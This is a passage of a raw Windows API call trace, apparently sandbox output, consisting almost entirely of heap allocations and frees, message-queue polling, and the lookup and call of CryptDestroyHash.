(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0029.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0029.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0029.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0029.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd48 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.954] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0029.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0029.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae968 [0029.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae968, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0029.956] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.956] CryptDestroyHash (hHash=0x7c2240) returned 1 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0029.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) 